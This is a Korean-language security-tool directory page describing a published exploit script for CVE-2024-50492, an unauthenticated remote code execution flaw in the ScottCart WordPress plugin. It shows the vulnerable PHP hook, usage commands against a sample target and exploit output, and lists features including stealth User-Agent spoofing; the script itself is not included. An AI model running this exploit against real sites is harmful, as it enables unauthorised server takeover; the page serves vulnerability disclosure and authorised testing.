Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2024-50492 — ScottCart <= 1.1 - 인증되지 않은 원격 코드 실행 | Kitploit
도구/GitHubGitHub/nxploited/cve-2024-50492
Payload GenerationVulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingLearning & Education
GitHubnxploited/cve-2024-50492

CVE-2024-50492

ScottCart <= 1.1 - 인증되지 않은 원격 코드 실행

저장소 보기
11년 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

🚨 CVE-2024-50492 - ScottCart <= 1.1 RCE 익스플로잇

🔥 ScottCart <= 1.1 용 익스플로잇 스크립트 - 인증되지 않은 원격 코드 실행
🧑‍💻 작성자: Nxploit – Khaled Alenazi


📌 설명

WordPress 용 ScottCart 플러그인 (버전 ≤ 1.1)은 원격 코드 실행(RCE) 에 취약합니다.
이로 인해 인증되지 않은 공격자가 취약한 AJAX 엔드포인트를 통해 서버에서 임의의 PHP 함수를 실행할 수 있습니다.

  • 플러그인: ScottCart ≤ 1.1
  • 취약점: 인증되지 않은 함수 삽입 → RCE
  • CVE: CVE-2024-50492
  • CVSS 점수: 9.8 - 치명적

🧠 작동 방식

플러그인은 보호되지 않은 AJAX 액션을 등록합니다:

root@kitploit:~
add_action('wp_ajax_nopriv_scottcart_load_function', 'scottcart_load_function_callback');

다음을 실행합니다:

root@kitploit:~
call_user_func($_POST['function']);

공격자가 기존의 모든 PHP 함수를 호출할 수 있게 합니다. 예:

  • phpinfo()
  • scottcart_get_the_user_ip()
  • system() ← 수정된 환경에서 확장된 경우

🚀 익스플로잇 기능

  • ✅ 취약한 엔드포인트를 트리거하기 위해 조작된 페이로드를 자동으로 전송
  • ✅ 인수를 통한 함수 재정의 허용
  • ✅ 기본 페이로드: PoC용 phpinfo()
  • ✅ 출력을 타임스탬프가 포함된 파일에 저장 (예: results_2025-03-26_14-33-01.txt)
  • ✅ 은닉을 위한 사용자 지정 User-Agent, 오류 처리, SSL 무시

🖥️ 사용법

root@kitploit:~
usage: CVE-2024-50492.py [-h] -u URL [-p PAYLOAD]

ScottCart <= 1.1 - Unauthenticated Remote Code Execution
By Nxploit Khaled Alenazi.

options:
  -h, --help            Show this help message and exit
  -u URL, --url URL     Target base URL (e.g., http://192.168.100.74:888/wordpress)
  -p PAYLOAD, --payload PAYLOAD
                        Function to call (default: phpinfo)

💡 예제

🔍 기본 동작 (phpinfo()를 사용한 PoC):

root@kitploit:~
python3 CVE-2024-50492.py -u http://192.168.100.74:888/wordpress

🔎 내부 플러그인 함수 호출:

root@kitploit:~
python3 CVE-2024-50492.py -u http://192.168.100.74:888/wordpress -p scottcart_get_the_user_ip

🧾 출력 예제

root@kitploit:~
[+] Target URL: http://192.168.100.74:888/wordpress
[+] Payload Function: phpinfo
[*] Launching exploit...
[+] Sending payload: function=phpinfo
[+] Exploit successful! Output:

PHP Version => 8.1.12
...

📁 그리고 저장됨: results_2025-03-26_14-33-01.txt


🛡️ 면책 조항

이 도구는 교육 및 승인된 테스트 목적으로만 사용됩니다.
소유하지 않았거나 테스트 권한이 명시적으로 부여되지 않은 시스템에 대해 사용하지 마십시오.


💬 크레딧

  • 💻 익스플로잇 제작: Nxploit – Khaled Alenazi
  • 🛡️ CVE ID: CVE-2024-50492
도구 다운로드